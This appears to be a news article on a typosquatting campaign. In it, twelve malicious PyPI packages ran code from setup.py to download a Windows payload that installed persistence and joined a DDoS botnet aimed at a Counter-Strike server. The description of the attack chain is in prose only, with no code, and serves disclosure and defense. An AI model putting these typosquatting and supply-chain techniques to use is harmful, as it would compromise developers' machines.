A dozen malicious Python packages were uploaded to the PyPi repository this weekend in a typosquatting attack that performs DDoS attacks on a Counter-Strike 1.6 server.
Python Package Index (PyPi) is a repository of open-source software packages that developers can easily incorporate into their Python projects to build complex apps with minimal effort.
However, as anyone can upload packages to the repository, and packages are not removed unless they are reported as malicious, the repository is being more commonly abused by threat actors who use it to steal developer credentials or deploy malware.
A malicious typosquatting campaign
This weekend, researchers at Checkmarx discovered that a user named “devfather777” published 12 packages that used a name similar to other popular packages to trick software developers into using the malicious versions instead.
Typosquatting attacks rely on developers mistakenly using a malicious package with a similar name to a legitimate one. For example, some of the packages in this campaign and their legitimate counterparts (in parenthesis) are Gesnim (Gensim), TensorFolw (TensorFlow), and ipaddres (ipaddress).
The complete list of uploaded malicious PyPi packages are:
Because software developers usually fetch these packages via the terminal, it’s easy to type its name with a letter in the wrong order. Since the download and build continue as expected, the victim doesn’t realize the mistake and infects their device.
While CheckMarx reported the packages to the PyPi repository, they remain online at the time of this writing.
Targeting CounterSrike servers
After downloading and using one of these malicious Python packages in their application, embedded code in the setup.py runs to confirm that the host is a Windows system, and if it is, it downloads a payload (test.exe) from GitHub.
When scanned on VirusTotal, only 11 out of the 69 antivirus engines mark the file as malicious, so it’s a relatively new/stealthy malware written in C++.
The malware installs itself and creates a Startup entry for persistence between system reboots, while it also injects an expired system-wide Root certificate.
Next, it connects to a hardcoded URL to receive its configuration. If that fails on the third try, it seeks responses to HTTP requests sent to DGA (domain generation algorithm) addresses.
“This is the first time we see a malware (strain) in the software supply chain ecosystem using DGA or, in this case, UGA to allocate generated name for new instructions for the malicious campaign,” comments Checkmarx in the report.
In the case observed by the analysts, the configuration ordered the malware to recruit the host into a DDoS bot that began sending traffic towards a Russian Counter-Strike 1.6 server.
The goal appears to take down the Counter-Strike Server by infecting enough devices that the sent traffic overwhelms the server.
The GitHub repository used for hosting the malware has been taken down, but the threat actor could resume the malicious operation by abusing a different file hosting service.
If you use the 12 mentioned packages and might have made a typing error this weekend, scrutinize your projects and double-check that you are using the legitimate software packages.